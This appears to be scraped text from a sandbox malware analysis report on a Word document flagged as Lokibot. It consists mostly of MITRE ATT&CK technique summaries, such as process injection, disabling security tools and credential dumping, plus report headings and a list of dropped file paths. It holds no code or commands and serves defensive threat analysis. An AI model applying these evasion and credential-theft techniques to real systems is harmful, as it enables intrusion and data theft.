Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SCB REmittance Advice.doc

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Lokibot

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Exploits

System Summary

Persistence and Installation Behavior

Snort Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sharonzx[1].exe

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{2AE73913-93B1-471C-89DC-6B3BEDA4951E}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{2418F8AC-8D83-4745-9879-3A9BB2FC151A}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{3A3A5CB7-517A-498A-9216-3F1F38B89998}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D64B8BBB-F7FA-4868-BA26-522FB5F8B8BC}.tmp

C:\Users\user\AppData\Local\Temp\1t3siil0.n0s.psm1

C:\Users\user\AppData\Local\Temp\4gwcgooj.z3k.ps1

C:\Users\user\AppData\Local\Temp\et5ti4wj.m1c.ps1

C:\Users\user\AppData\Local\Temp\nj3klq2k.amq.ps1

Windows Analysis Report
SCB REmittance Advice.doc

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.
Tactics:	Collection
Data Sources:	Logon Session: Logon Session Creation, Process: Process Access, Process: Process Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre